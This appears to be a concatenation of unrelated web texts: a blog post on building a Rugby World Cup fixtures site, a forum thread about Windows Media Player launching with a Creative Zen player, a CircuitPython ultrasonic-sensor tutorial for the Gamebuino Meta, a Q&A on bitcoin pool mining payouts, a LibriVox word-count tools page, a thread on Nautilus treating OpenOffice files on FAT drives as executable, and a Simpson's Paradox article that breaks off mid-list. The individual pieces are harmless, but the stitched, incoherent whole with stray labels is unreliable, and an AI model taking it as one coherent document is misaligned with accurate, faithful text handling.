process calls rfork(RFMEM | RFPROC), all segments are maintained across the
fork except the Stack segment. When a process calls exec(), segments marked
with SG_CEXEC are detached; the rest are inherited across the exec(). The
Stack segment can never be inherited.
Across an rfork(RFMEM | RFPROC), new segattach()es and segdetach()es are not
visible - in Ron Minnich's terminology, we have shared memory, but not
shared address spaces.
First, I modified the segment slot structures, to lift the limit on four
user segments. I made the segment array dynamic, resized in segattach(). The
first few elements of the array are as in the current system, the special
Text, Data, BSS, and Stack segments. The rest of the segment array is
address-ordered, and searched via binary searches. The user/system interface
doesn't change, except that the limit on segment attaches is now from the
kernel memory allocator, rather than a fixed per-process limit.
I further changed segattach() to add more flags:
A segment with the SG_NONE flag set does not have a backing store. Any
accesses, read or write, cause a fault. This segment flag is useful for
placing red zones at user-desired addresses. It is an error to combine the
SG_NONE and SG_COMMIT flags.
A segment with the SG_COMMIT flag set is fully pre-faulted and its pages are
not considered by the swapper. An SG_COMMIT segment is maintained at commit
status across an exec() and rfork(RFMEM | RFPROC). If we are unable to
satisfy pre-faults for all of the pages of the segment in segattach(), we
cancel the attach. It is an error to combine the SG_COMMIT flag with the SG_NONE flag.
A segment attached with the SG_SAS flag appears in the address space of all
processes related to the current one by rfork(RFPROC | RFMEM). An SG_SAS
segment will not overlap a segment in any process related via rfork(RFMEM | RFPROC).
I finally changed libthread. Currently, libthread allocates thread stacks
via malloc()/free(). I converted libthread to allocate thread stacks via
segattach() - each thread stack consists of three segments, an anonymous
segment flanked by two SG_NONE redzones.
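To give an idea of the shape of this, here is a hypothetical sketch of such a stack allocation using the extended segattach() interface described above (the address, sizes, and error handling are illustrative only, not the actual libthread code):

/* one thread stack = redzone + stack + redzone */
enum { Redzone = 4096, Stacksize = 32*1024 };

uchar*
stackalloc(void *va)
{
	uchar *lo, *stk, *hi;

	lo  = segattach(SG_NONE, "memory", va, Redzone);
	stk = segattach(0,       "memory", lo + Redzone, Stacksize);
	hi  = segattach(SG_NONE, "memory", stk + Stacksize, Redzone);
	if(lo == (uchar*)-1 || stk == (uchar*)-1 || hi == (uchar*)-1)
		sysfatal("segattach: %r");
	return stk;
}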
Currently I have posted a prototype (very generously called 'prototype')
implementation of the above interface to sources; the prototype kernel omits
a number of the checks claimed above. SG_SAS faults are not handled; SG_SAS
segments must be SG_COMMIT. SG_COMMIT has no limit, which makes it very easy
to crash a system by draining the page queue readily. The prototype
libthread is of considerably higher quality, I think, and would be usable as a
production-grade implementation of these interfaces. The prototype kernel is
usable though - I have run it alone on my terminal for approximately a
However, the prototype kernel shows us that the interface can be implemented
efficiently - even when using three segattach()es per thread stack, creating
1024 threads took 2.25s real time on a 400MHz AMD K6, versus 0.87s realtime
with the original libthread and 9 kernel. Creating processes with thousands
of segments is not incredibly speedy, but it is workable and there is a lot
of low-hanging fruit that can improve performance.
The SG_SAS work is fairly unusual for Plan9 - each process originally had a
single, fixed-size segment slot array. Now, a process has a per-process
segment array and a second shared segment array. The shared array is
referenced by all processes created by rfork(RFMEM | RFPROC); the shares are
unlinked on exec() or rfork(RFPROC). The SG_SAS logic was added to match the
current semantics of thread stacks - as they are allocated by malloc() and
free() from the Data segment, they are visible across rfork(RFMEM | RFPROC);
this is as expected - a thread can pass a pointer to a stacked buffer to an
ioproc(), for example. To allow for standalone segments to be used the same
way, they needed to appear across rfork().
This interface would also support a libc memory allocator that uses
standalone segments, rather than constraining it to use sbrk() or
pre-allocated segments. This was my original motivation for this project,
though it was a problem I did not get a chance to address.
Any thoughts or discussion on the interface would rock.
|
OPCFW_CODE
|
Aspects of ecosystem services that an organisation or other actor relies on to function. Dependencies include ecosystems’ ability to regulate water flow, water quality, and hazards like fires and floods; provide a suitable habitat for pollinators (who in turn provide a service directly to economies), and sequester carbon (in terrestrial, freshwater and marine realms).
SBTN (2022) Working Definitions [unpublished]
Dependencies can be identified by working through a dependency pathway.
A dependency pathway shows how a particular business activity depends upon specific features of natural capital. It identifies how observed or potential changes in natural capital affect the costs and/or benefits of doing business.
A particular business activity (e.g. coffee production plant) depends upon a specific ecosystem service (e.g. pollination of coffee plants). The pathway identifies how observed or potential changes in natural capital (e.g. decline in bee population due to human-induced habitat change) affect the cost or benefits of doing business (e.g. pollination services imported).
Nature impacts can be identified by working through impact pathways.
Changes in the state of nature, which may result in changes to the capacity of nature to provide social and economic functions. Impacts can be positive or negative. They can be the result of an organisation’s or another party’s actions and can be direct, indirect or cumulative.
A measurable quantity of a natural resource that is used as a natural input to production (e.g. the volume of sand and gravel used in construction) or a measurable non-product output of a business activity (e.g., a kilogram of NOx emissions released into the atmosphere by a manufacturing facility).
An impact pathway describes how, as a result of a specific business activity, a particular impact driver results in changes in natural capital, and how these changes in natural capital affect different stakeholders.
An example of an impact pathway could be as follows: As a result of a specific business activity (e.g. chemical manufacturing plant), a particular impact driver (e.g. air emissions) results in changes in natural capital (e.g. reduced air quality) and how these changes impact different stakeholders (e.g. health problems).
A further example of an impact pathway is provided in the figure below.
The tables below present a selection of potential impact drivers and dependencies to consider when identifying which are most material to your business. You will notice that a business activity (e.g., the use of water) can create both impacts and dependencies and thus appear in both tables. Note: the lists are not exhaustive; impacts and/or dependencies that are relevant to your business but not included here should also be considered.
|
OPCFW_CODE
|
Take a look at control and form properties. You initialize them as much as possible at design time in the Properties window. In contrast with VB, GFA-BASIC 32 needs extra code to initialize the item properties of every Ocx that supports a Item collection (ToolBar.Buttons; Status.Panels; etc). Initialization is so important to control and form properties that GFA-BASIC should be extended with more property pages to initialize items at design time. For example, we could use a property box to initialize the strings of a ListBox control at design time, a task you have to perform at run time now.
Initializing variables in general
In some languages, uninitialized variables have a semi-random value. In C, for example, local variables (but not global or static variables) are undefined. If you want an initial value, you must give it. Fortunately for C programmers, this is easy to do. An undefined variable is a disaster waiting to happen, and careful C coders initialize their variables as close to declarations as possible. In contrast, GFA-BASIC 32 always initializes all variables whenever they are declared. String variables are initialized to a "Null-String", numeric variables are initialized to 0, Variants are initialized to Empty, and object variables are initialized to Nothing.
This difference fits the philosophies of C and Basic. C doesn’t initialize local variables to a default because that initialization must happen at run time. This has a cost, and C doesn’t do any run-time work unless you ask for it. Undefined variables are dangerous, but that’s your problem. GFA-BASIC 32 is more concerned with safety. If you declare an array of 5000 Integers, GFA-BASIC 32 will initialize them all to 0 even if it takes extra run-time work to do so.
However, 0 or Empty might not be the initial value the program needs. In C, you can combine the declaration of a variable with its initialization:
int cLastWindow = 20;
Even arrays can combine a declaration and initialization.
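For instance:

int aWindows[3] = {10, 20, 30};  /* declaration and initialization in one step */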
Fortunately, GFA-BASIC 32 allows declaration and initialization in one statement:
[Global] Dim iCountMax As Integer = 23
This usually works fine, and by using the Global statement global variables can be declared in any procedure. GFA-BASIC 32 doesn't provide a 'Declarations' section at the top like VB, so we must take care when and where we declare global variables. The problem is that initialization-while-declaring requires executable code: the default value must be copied to the variable's memory location.
You need to find some logical place to put the declaration & initialization. That place must be reached only once—either when the program is executed or the first time the variable is accessed.
Global vs Static Variables
A Static variable is a global variable as well. The difference is that a global variable is visible to all parts of your program, while static variables have an implicit Local clause in front of them: they are only accessible inside a procedure. (Note - A Static variable in the main part of the program is local to the Main section only.) A Static variable can be initialized in combination with a declaration:
Static fFirstTime As Boolean = True
A Static variable is only initialized once, the first time the subroutine is executed. If you were to put a global variable declaration & initialization inside a subroutine, the global variable would be initialized over and over.
|
OPCFW_CODE
|
At Explo, we take an ID photograph for each student and faculty member when they show up. We take the photos with a mobile device, and within a day they get a lanyard with their photo ID, which they have to carry around all summer. It’s nice when you’ve got 3000 students across three campuses, running field trips all over New England and beyond, to be able to tell who is associated with Explo and who isn’t.
Recently I had the idea: we’ve got these 3000 photo IDs, what does the “average” Explo person look like? I did a quick search online for things like “face morph”, “merge faces”, etc, and you’d be surprised at the proliferation of hideously designed sites claiming to do this. Most of them allow you to merge two different photographs together. None of them allow uploading of 3000 images :)
I don’t have the time to create a solution which does facial geometry mapping and morphs each image into another face, so I figured an approach more like Francis Galton’s “multiple exposure” method from the 1800s, except using computers, would be the ticket. Now I love me some ImageMagick and BASH scripting, so I figured I could probably do this that way.
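The heart of the multiple-exposure approach comes down to a single ImageMagick invocation; a minimal sketch, assuming the ID photos are already cropped to the same dimensions (filenames are illustrative):

# average every ID photo into one composite "face"
convert ids/*.jpg -evaluate-sequence Mean average-face.jpg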
I knew I had to present the results in a better way than just emailing a photo to my coworkers, so I made a website to display the results and the process. Go check it out. That page also has more about my failed attempts and what’s going on. You can also view the source of the image merge script I wrote, and the source for the entire “Faces of Explo” page.
“Wait,” you’re asking, “You promised me rakefiles! You promised me HTML!” You’re absolutely right, thanks for hanging in there, I’m getting to that.
Since creating the web page itself was a relatively trivial process, I thought I’d take the opportunity to try out a couple of new things that had been on my list of cool things I keep reading about on Hacker News. One of those things is using a Rakefile to help with development and deployment. For those of you who don’t know what the hell that is, I found these three articles to be immensely helpful. In short, you write a file that contains the typical things you’d want to do in whatever software project you’re working on, and you can quickly access them from the shell.
For example, on this project, I wanted to be able to:
- Watch/compile my CoffeeScript and SCSS while I was developing without always having to open up two tabs in my terminal and run the watcher routine for both.
- Compress, strip, interlace, and otherwise prepare any image files for the web.
- Deploy the entire site using rsync (since this is a static site).
I managed to be able to do all of that. Now I can type things like rake compile:all or rake deploy instead of having to remember the command line incantation every time I just want to make a simple change. Here is the rakefile – I owe much to the rakefile from the Octopress project, which is a nice thing to behold.
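A minimal sketch of what such a Rakefile might look like (the task names mirror the ones above; the commands and paths are illustrative, so see the linked rakefile for the real thing):

namespace :compile do
  desc "Watch and compile CoffeeScript and SCSS in one go"
  task :all do
    pids = [
      spawn("coffee --watch --compile --output js/ src/"),
      spawn("sass --watch scss:css")
    ]
    pids.each { |pid| Process.wait(pid) }
  end
end

desc "Deploy the static site over rsync"
task :deploy do
  sh "rsync -avz --delete public/ user@host:/var/www/site/"
end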
Where’s the Missing HTML?
Take a look at the source for the Faces of Explo index HTML page. If you write any HTML code at all, a few things will probably stick out for you immediately: “Hey! He’s not closing any of his paragraph tags? Where’s the HTML tag? Where’s the body? WHAT THE HELL IS GOING ON HERE?”
That’s what I would have thought a week ago looking at the source. That’s before I read Google’s HTML/CSS StyleGuide. As it turns out, many HTML tags are optional in HTML5. Whoa. As they say in the guide,
(This approach may require a grace period to be established as a wider guideline as it is significantly different from what web developers are typically taught. For consistency and simplicity reasons it is best served omitting all optional tags, not just a selection.)
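To make this concrete, here is a complete, valid HTML5 document with every optional tag omitted:

<!DOCTYPE html>
<title>Hello</title>
<p>No html, head, or body tags here, and it's still valid HTML5.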
Why is it that nobody’s talking about this new part of the HTML5 spec? I’ve been reading the cool “learn HTML5” sites, and haven’t seen anything about this. I learned it from a footnote in the Google styleguide: let’s bring this syntax into a wider discussion.
I’ve found that you can learn a lot from a style guide. Since they are a condensation of all the things that bug people when they read other people’s code, they are a good guideline for how to write good code, even if you don’t necessarily agree with everything they say. I for one am probably not going to use the abbreviated HTML syntax in my bigger public-facing pages just yet, as I’m concerned about it breaking on older browsers, and maybe even breaking tools like Modernizr.
Stay away from doing Google searches for image morphing, use Rakefiles for automating development tasks, and read other people’s style guides - you might learn something fascinating! Thanks for reading.
|
OPCFW_CODE
|
Data Directory: File path to the directory where your recorded takes will be stored. The data directory can be changed by clicking the “…” button and then selecting a new Data Directory folder.
Take Format: Determines how the shot name and take number are resolved into the current take name. This setting can also be edited by double clicking on the current take name.
Watch Save File: Coming Soon
Select: Options for the select field in the Recorded Takes Panel of PeelCapture. Different options should be separated by a comma as shown in the screenshot above.
Device Poll (seconds): The devices are constantly polled to check their status. Change this value to increase or decrease how often this poll happens. This will not affect the performance of the application or devices during recording but rather changes how often the device’s UI is refreshed when the application is idle.
Record Delay: Set a number of seconds to delay the start of recordings after the record button is pressed. Useful for when operating a mocap shoot solo.
Bloop wav: Audio file used during Bloop Events.
Bloop Events: Options for when the Bloop wav is played while recording a take. Start and End will play bloop at the start and end of recording respectively. The 1-3 second options will play Bloop wav at these intervals at the start of recording if selected.
Audio Device: Select the audio device to be used for audio recording, timecode, or both. Only one audio device can be selected. Input Device must be selected to edit the other related fields.
Audio Channels: Select the number of audio channels that you would like to be available for timecode or recording. This will be shown in the Audio Panel as well as the number of options available for selection in the Timecode tab.
Sample Rate: Audio sample rate.
Sample Size: Audio sampling size.
Output Device: Select the audio device to be used for audio output generated from Peel Capture. For example, the audio to indicate a take has started or ended.
Audio can be added as a device to record all channels of the audio device. These channels will be saved as individual .wav files in the Data Directory Folder/Audio Device Name.
Timecode defaults to the PC Clock; select a source to read the timecode in from your own device. Built-in options are PC Clock, Vicon, and Motive. Note: For an external timecode source, you must set the audio device in the Audio tab for the audio channels from your device to be selectable. Active channels can be seen in the Audio panel in the bottom right of the interface. Audio level can be seen in the Timecode tab and Audio panel.
The level meter will show if the audio source signal is active and should usually be floating somewhere in the middle of the bar. If it is too far to the left or all the way to the right, the timecode value may glitch or fail. The quality of the audio interface device will affect the performance of the timecode.
Timecode is used for syncing all of your sources via the PeelCapture website. The starting and ending timecode value is saved for each take in the Takes panel and then is uploaded to the website for syncing purposes. Peel Capture’s web interface allows you to choose timeframes from your reference footage to frame shots for post-production orders.
Enter the hostname of the computer running the Vicon software to connect using the DataStreamSDK. This is used to populate the current subjects.
Check the Enabled checkbox to try to connect to the computer running the Vicon software.
Check the Subjects box if you want to populate the current subjects with the subjects from the Vicon software if the connection was successful.
PeelCapture is able to connect to the NaturalPoint Motive real-time stream to get active subject names. This connection uses the NatNet SDK and can be configured in the PeelCapture settings dialog. There is also a Motive device in PeelCapture, which is used to start and stop recording motion capture data in Motive. Please see the Motive Device section of this documentation for information about how to configure Motive settings.
The settings in PeelCapture Options are:
Server Address: The IP or name of the computer running motive
Local Address: The address of the PC running PeelCapture – try using 255.255.255.255
Protocol: Set the protocol to match the “Transmission Type” settings in Motive.
Multicast Address: Try 188.8.131.52
Command Port: Use 1510
Data Port: Use 1511
Motive’s status is indicated at the bottom of these settings as Connected/Disconnected.
The Shotgun site URL, script name, and key can be entered for uploading data to Shotgun. Further configuration can be done by editing python/peel_shotugun_publish.py.
Enter your credentials for PeelCapture online services for uploading data and managing projects. Choose the corresponding Company, Project, and Shoot Name before the shoot starts to quickly upload your data to our website once you are finished shooting.
The information shown in the slate window and font can be modified in the Slate Settings.
The slate window can be shown by selecting the “Slate” item in the “Window” dropdown menu.
This window can be shown on a second display during the shoot, or recorded to a device for reference video.
|
OPCFW_CODE
|
[aes] Add domain-oriented masking
This PR adds a new S-Box implementation for AES using domain-oriented masking (DOM).
To this end, the distribution of pseudo-random data inside the cipher core needs to be adapted as well. To ease review, I have factored out this first commit into #4642. Please only review commits 2 and 3 of this PR.
Note: this PR requires also #4629 .
The DOM S-Box added with this PR has a latency of 5 clock cycles, is unpipelined and requires 28 bits of randomness per evaluation (Canright no-reuse was at 18 bits per evaluation). Since we are using a 128-bit wide datapath with 16 S-Boxes in parallel, there is currently no benefit in using pipelining inside the S-Box. The pipelined versions in the original paper require between 2.6-2.8 kGEs. By avoiding pipelining and applying some additional, new optimizations, this implementation requires less than 1.4 kGE per S-Box. The overall resource consumption of AES with this S-Box is around 73 kGE.
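For readers unfamiliar with DOM, the core building block is the masked multiplier (AND gate), where cross-domain product terms are remasked with fresh randomness and registered to stop glitch propagation. A generic first-order sketch of the idea (illustrative only, not the code in this PR):

// Illustrative first-order DOM AND gadget (not the PR implementation).
// Shares: a = a0 ^ a1, b = b0 ^ b1; z is one bit of fresh randomness.
// Inputs must be held stable for the extra register cycle.
module dom_and (
  input  logic clk,
  input  logic a0, a1, b0, b1,
  input  logic z,
  output logic q0, q1       // q0 ^ q1 == a & b
);
  logic cross0_q, cross1_q;

  // Remask the cross-domain terms with z and register them.
  always_ff @(posedge clk) begin
    cross0_q <= (a0 & b1) ^ z;
    cross1_q <= (a1 & b0) ^ z;
  end

  // Combine with the inner-domain terms per share.
  assign q0 = (a0 & b0) ^ cross0_q;
  assign q1 = (a1 & b1) ^ cross1_q;
endmodule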
Functional correctness of this implementation has been verified. The masking scheme has not yet been formally verified using the REBECCA tool: static analysis is passing, transient analysis is currently running (and most likely will run for a couple more days).
What's left to do:
[ ] Successfully pass transient analysis using REBECCA.
[ ] Perform initial SCA on FPGA.
[ ] Replace the (* keep = true *) attributes (Vivado and Yosys only) by prim_flop entities.
Update: The transient analysis in REBECCA has now been running for nearly 2 weeks without failure. First FPGA results using this implementation show massive leakage. The resistance against the correlation-enhanced collision attack is comparable with the unhardened implementation (~300000 traces, Canright no-reuse resists up to 1.2 Mio traces). :-(
Thus, I have now reworked the DOM S-Box to add more registers. Due to limitations of the REBECCA tool (doesn't like control signals such as register write enables inside the masked circuit) I can't formally verify the new implementation. However, on the FPGA we get substantial improvements in terms of resistance: with 2 Mio traces, just one single key byte difference can be guessed correctly! We would need at least 15 of 120 key byte differences to recover the key...
I will now clean up this new implementation and update this PR. Please wait with reviewing this and have a look at #4629 and #4642 first.
sorry i've been SUPER behind on the review here.
I will try to get to it next week, although I might just end up asking more
questions :)
No worries @tjaychen , this PR is currently not so critical. I would prefer people having a look at my other AES PRs that are more urgent in particular #4629.
Thanks a lot @cdgori for your review and sorry for getting back so late. I had to prioritize other, somewhat less exciting tasks but hope to finish this one soon. I basically need cleanup the DOM S-Box (have a working example with more registers) and then scale down the PRNG.
Update: I've cleaned up the DOM S-Box implementation that I had previously successfully measured on FPGA and shrunk the PRNG (giving us back almost 10 kGE). Currently collecting new power traces and running formal verification.
Update: had to do a rebase and fix a critical issue. I could confirm that the current version is again secure up to at least 2M traces on FPGA. Formal verification is still running.
Thanks @cdgori for your feedback and review. And thanks @imphil for approving the PR.
|
GITHUB_ARCHIVE
|
Not everyone speaks English, so if you aren’t fluent in Spanish, be sure to bring someone who can translate for you.
Whatever the nationality, anyone travelling to Peru for business purposes, especially when business contracts or agreements are signed or business-related financial transactions are made, must apply for a business visa at a Peruvian Consulate before entering the country.
Dear Eva, I will be in US-Houston on 10 November for a touring trip, and I would like to travel from US-Houston to Peru-Lima for tourism for 5 days. I have an Iraqi passport, and the issue is we don’t have a Peruvian Embassy or Consulate in our country. Can I receive the visa at the airport in Peru, or is there another way to get it online via the internet?
Philippine passport holders don’t have to apply for a tourist visa. They get an entry stamp (= tourist visa) in their passport at the airport or border. So you will not have any problems coming to Peru.
These procedures also worked as a great way to see that other people have the same interest as my own to learn a great deal more about this subject. I know there are many more enjoyable times ahead for those who start reading.
Following Peruvian law the maximum (!) stay on a tourist visa is 183 days (not 90 days), but there is no guarantee you get the full amount immediately. So it’s probably best to ask for it and make sure you get the number of days you intend to stay in Peru.
At this time the airport isn’t so hectic; I think one hour should be adequate to clear immigration and customs. Furthermore, the airport recommends being at check-in for your domestic flight 2 hours before the flight leaves.
I am an Indian citizen working in the UAE. I have to visit Peru as a tourist to see my Peruvian girlfriend. So what will be the requirements for that? I will stay with her, so I don’t have any hotel booking either. Help me out, or any suggestions?
Slovenian citizens do not have to apply for a visa at a Peruvian Embassy or Consulate prior to entering the country. You get an entry stamp at the airport that allows you to stay the number of days written on it by hand by the immigration officer.
One of the requirements when applying for a visa for Peru in the US is having legal residency (not a tourist visa) in the States. Have a look at the website of the Peruvian Consulates in the US ("") for detailed info.
Hi, I’m a Filipina married to a Peruvian. Our marriage was performed in the Philippines, 8 years ago now. In 2010, me and my son (who was born in the Phils.) and my Peruvian husband decided to live here for good. I came here with our complete paperwork stamped by the Thailand embassy, knowing that there is no Peruvian embassy in the Phils. When I arrived, me and my son used the tourist visa... and until now I’m still requesting the extension of authorization to stay here.
I would like to volunteer in Peru over the winter. I’m a Nepali citizen on a student visa (F1) in the US. I went to Costa Rica 2 years back, since if you had a student visa for the US, you could visit Costa Rica for three months. I’m wondering if Peru has a provision like that?
I’m looking to travel to Peru to volunteer with an organization for a year. Do I get a tourist visa? But this is only valid for 183 days?
|
OPCFW_CODE
|
- For other appearances of Valeera Sanguinar, see Valeera Sanguinar (disambiguation).
How to get
Diao Chan Valeera can be purchased through a bundle for returning players only.
- Diao Chan Valeera could be purchased through the Three Kingdoms Mini Bundle or the Three Kingdoms Bundle.
- Comes with her own portrait
- Has custom emotes
When viewed in the collection, Diao Chan Valeera has the following flavor text:
- Even a smile can be a weapon if it's wielded properly. Not to mention those fans... Obtained by purchasing the Three Kingdoms Mini Bundle or the Three Kingdoms Bundle.
|Emote: Greetings||▶️Why, hello!|
|Emote: Well Played||▶️Well fought.|
|Emote: Oops||▶️An error?|
|Emote: Threaten||▶️Even flowers have thorns.|
|Emote: Thanks||▶️Thank you kindly.|
|Unused: Sorry||▶️Sorry about that.|
|Concede||▶️I give up.|
|Start||▶️Shall we dance?|
|Running out of time||▶️I must choose soon!|
|Thinking ||▶️I wonder...|
|Thinking ||▶️So many options...|
|Almost out of cards||▶️I'm almost out of cards!|
|Out of cards||▶️I'm out of cards!|
|Error: Need a weapon||▶️I need a weapon.|
|Error: Not enough mana||▶️I don't have enough Mana.|
|Error: Minion exhausted||▶️That minion already attacked.|
|Error: Hero already attacked||▶️I already attacked.|
|Error: Minion not ready||▶️Give that minion a turn to get ready.|
|Error: Hand already full||▶️My hand is too full!|
|Error: Too many minions||▶️I have too many minions.|
|Error: Can't target Stealthed minion||▶️I can't target Stealthed minions.|
|Error: Can't play that card||▶️I can't play that.|
|Error: Not a valid target||▶️That's not a valid target.|
|Error: Must attack Taunt minion||▶️A minion with Taunt is in the way.|
|Error: Generic||▶️I can't do that.|
|Selection in Choose Your Hero||▶️Who, me? Suspicious?|
|Emote: Greetings [Lunar New Year]||▶️Happy New Year!|
|Start [Mirror]||▶️It takes two, after all.|
|Emote: Greetings [Holidays]||▶️Happy Feast of Winter Veil.|
|Emote: Greetings [Happy New Year]||▶️Happy New Year!|
|Emote: Greetings [Fire Festival]||▶️Happy Midsummer.|
|Unused: Greetings [Pirate Day]||▶️Yarrr!|
|Emote: Greetings [Happy Halloween]||▶️Happy Hallow's End.|
|Unused: Greetings [Happy Noblegarden]||▶️Happy Noblegarden.|
|Emote: Greetings [Mirror]||▶️There's a familiar face.|
- Patch 188.8.131.52662 (2021-03-25): Fixed a visual bug where parts of Diao Chan Valeera were not appearing animated.
- Patch 184.108.40.206003 (2021-01-21): Added.
|
OPCFW_CODE
|
On IRQL alone, there is a twenty-page document you can find on MSDN. DriverDispatcher handles messages sent to the driver and is usually used to serve messages from user mode applications that request some action to be done in kernel mode. Gilman: Thanks Sir, the approach you take is definitely more friendly and detailed; I hope it will allow me to get through the available samples. Other than that, it's the best beginner's guide to writing Windows drivers.
Dejan Lukan: It's an explanation of how you can go about writing a kernel driver, which is in ring 0, yes. Create a user interface (C#.Net) and call the DLL. In addition, Microsoft knew that drivers had to be writable in a higher-level language, like C, in order to be code-compatible for different hardware systems. This is because you only need that function during initialization. https://msdn.microsoft.com/en-us/windows/hardware/drivers/gettingstarted/
All the other options (System, Boot and Automatic) cause the driver to be loaded during boot-time - which can be fatal if your driver has a bug in it. The parameters are explained in more detail at "IoCreateDevice". This type of driver will not only function perfectly well on Windows 2000 and XP - but will also work on Windows NT4.
Thanks! This unload routine must be specified during DriverEntry if our driver is to be unloadable, and a pointer to the routine stored in the DriverObject: #include
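(The #include at the end is cut off in this copy. As a rough sketch of the skeleton being described - DriverEntry storing a pointer to the unload routine in the DriverObject - with illustrative routine names rather than the article's actual code:)

#include <ntddk.h>

VOID Example_Unload(PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    DbgPrint("Example_Unload called\r\n");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(RegistryPath);

    /* Store the unload routine so the driver can be unloaded at runtime. */
    DriverObject->DriverUnload = Example_Unload;
    return STATUS_SUCCESS;
}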
Generally, you maintain a stack of drivers, each with a specific job to do. The one thing to remember with UNICODE_STRING is that they are not required to be NULL terminated, since there is a size parameter in the structure! https://msdn.microsoft.com/en-us/library/windows/hardware/ff557573(v=vs.85).aspx
Using UMDF today is a problem. UMDF V1 is the older model. It'll support devices running on Windows versions as old as Windows XP. But UMDF V1 uses an odd, difficult programming model. When developing a driver, it's often the case that the driver doesn't work on the first try, so we will crash our whole system. This doesn't even need to be a real physical serial port! There are also system admin tools which others have built: http://technet.microsoft.com/en-us/sysinternals/bb545021 (in the past called SysInternals, built by Mark Russinovich, co-author of "Windows Internals" - MUST READ!!) and http://technet.microsoft.com/en-us/sysinternals/bb963901
And you don't need to spend lots of money or use complicated IDEs, because the official Windows Device Driver Development Kit (Windows DDK) can be obtained from the following location: http://www.microsoft.com/whdc/devtools/ddk/default.mspx We can call it BufferFly() if we want. In the last piece of this article, we will be writing a user mode application to talk to our driver; it will simply do CreateFile, WriteFile, CloseHandle. Driver history: in the old days of DOS, the computer was free land where anything goes.
This operation will then give us a system virtual address which we can then use to read the memory. Correct this please, it's really confusing for me and others: usDriverName ---> usDeviceName. Good article, very detailed. Please update the links.
The network mapped drive may map E: to \Device\NetworkRedirector and the memory stick may map E: to \Device\FujiMemoryStick, for example.
The second string, "\DosDevices\Example", we will get into later as it's not used in the driver yet. Windows compatible hardware development boards offer an affordable, yet powerful development system targeted towards the hardware developer, IHV, OEM or any other developer. The drivers for both systems at this point were generally written in assembly language as well.
How to develop a basic Hello World device driver and call its functions from a C#.NET Windows application: http://tektips.in/how-to-develop-a-he... The I/O manager does not copy the data, it does not lock the user mode pages in memory, it simply gives the driver the user mode address buffer. There are functional and object-oriented ways to program drivers, depending on the language chosen to write in. A good starting point is reading the WDF Overview Word documents.
Every IRP contains all of the information needed for any driver to be able to process a request and return the result. Aman Thakur: Hi Tony, you saved a lot of my time and helped me understand. Awesome article for beginners like me.
|
OPCFW_CODE
|
How do I Extrude Faces Along Normals, and also shrink in two other directions?
I am extruding plane surfaces along surface normals by selecting the plane, then hitting Option-E (Alt-E), then selecting Extrude Faces Along Normals.
That is all fine, but I also want to shrink the object along the two local axes that are perpendicular to the Normal. So, as the plane gets thicker in one direction, it gets smaller in the other two directions.
I would be grateful for any pointers.
Akin to inset then translate inset face along normal?
Truth be told, I do not know. If we call the Normal, the local Z, then I want to shrink in X and Y. The angles should remain right angles.
This works with Scale, I can edit in X,Y, and Z. But the Z does not exist until I have extruded the plane along its normal. As I do that, I want to also scale the two dimensions of the plane.
is this what you wanna do? https://youtu.be/UViI4VKy-Ww
@Chris Not quite. I want the sides to go in without the angles changing. So not a cuboid becoming a truncated pyramid, but a plane extruding into a cuboid and then scaling down in the two directions that are perpendicular to the normals.
can you show with two pictures what you want?
last try from me: do you want to change it like this after extrude: https://youtu.be/WEpuyZ1I2Ck
Yes, sure. I have added images to the question. 1. Plane. 2. Extruded. 3. Scaled.
Uniform scale around individual origins then extrude along normals.
Imagine the simple case: six square faces arranged as if they were the six faces of a cube. I would want to scale the 'top' surface in X and Y and not Z. I would want to scale the 'front' surface in X and Z but not Y. I would want to scale the sides in Y and Z and not X. And so on.
Here is the default cube, rotated arbitrarily in edit mode, and after applying edge split modifier to make each face a plane as described.
Uniform scale each by half S 0.5
Extrude along normal by 1 AltE 1
Notice the zero dimension along normal of each plane remains unaffected by scaling.
- To sum up for those who want to do this:
- Starting from the planes. Select all in Object Mode.
- Go to Edit Mode.
- Choose Face Selection method, Select All.
- Transform Pivot Point, Individual Origins.
- Then Scale (S) and after, Extrude Faces Along Normals (Option-E).
- Thanks batFINGER and @Robin Betts Please edit my summary if needs be. Now to do it in Python (see the sketch below)!
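A minimal bpy sketch of that summary (my own rough take against the Blender 2.8x API; it assumes the planes are joined into the active mesh object, and the operators may need a 3D Viewport context for the pivot setting to take effect):

import bpy

bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.select_mode(type='FACE')
bpy.ops.mesh.select_all(action='SELECT')

# Pivot around each face's own origin so every plane scales in place.
bpy.context.scene.tool_settings.transform_pivot_point = 'INDIVIDUAL_ORIGINS'

# Uniform scale first; the zero dimension along each normal is unaffected.
bpy.ops.transform.resize(value=(0.5, 0.5, 0.5))

# Then extrude every face along its own normal.
bpy.ops.mesh.extrude_region_shrink_fatten(
    TRANSFORM_OT_shrink_fatten={"value": 1.0}
)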
If you think about this one the other way round..
The I Inset operator has a 'Depth' setting, which you can adjust in its F9 panel.
If you need further adjustments, perpendicular to normals, for unconnected faces, you could set Pivot to 'Individual Origins', Transform Orientation to 'Normal', and scale in the per-face XY... SShiftZ.
Oops, just read the commentary, but the second half might still apply.
Lol, thought exactly the same thing. Was also thinking solidify modifier thickness driving scale.
in edit mode:
extrude with E and move the mouse up (so you got 4 vertices) - you know this
Tap A to select all vertices
Tap S to scale
Tap Shift Z to scale only on the x and y axes -> move your mouse to your desired scale
An issue will arise in the scaling step if the face normal is not axis-aligned, which kinda warrants going in the other order: uniform scale, then extrude.
@batFINGER You correctly anticipate what I am trying to avoid, but I have problems with the uniform scale. I have a large number of these planes, all at different orientations. I can select them all and extrude along their normals. Easy.
If I try to do uniform scale on all the planes, I have a problem even if I pivot around individual origins. Imagine the simple case: six square faces arranged as if they were the six faces of a cube. I would want to scale the 'top' surface in X and Y and not Z. I would want to scale the 'front' surface in X and Z but not Y. I would want to scale the sides in Y and Z and not X. And so on.
If it helps, I will be doing this in Python so perhaps I can scale only along axes that are not zero?
@Chris Thanks! That is working nicely for one object. I need to spend some time to see if I can do this on many objects at the same time.
|
STACK_EXCHANGE
|
How I would build my 2019 Rugby World Cup fixtures site differently next time.
Mid-September, over a typhoon holiday long weekend in Taipei, I put together a very simple website for the 2019 Rugby World Cup. My goal was to show all the fixtures of a tournament for a range of time zones. I also wanted to challenge my design skills and further refine my JAMStack development skillset. I didn't want it to be overly complicated. And I wanted to build it without using any libraries or frameworks as much as possible.
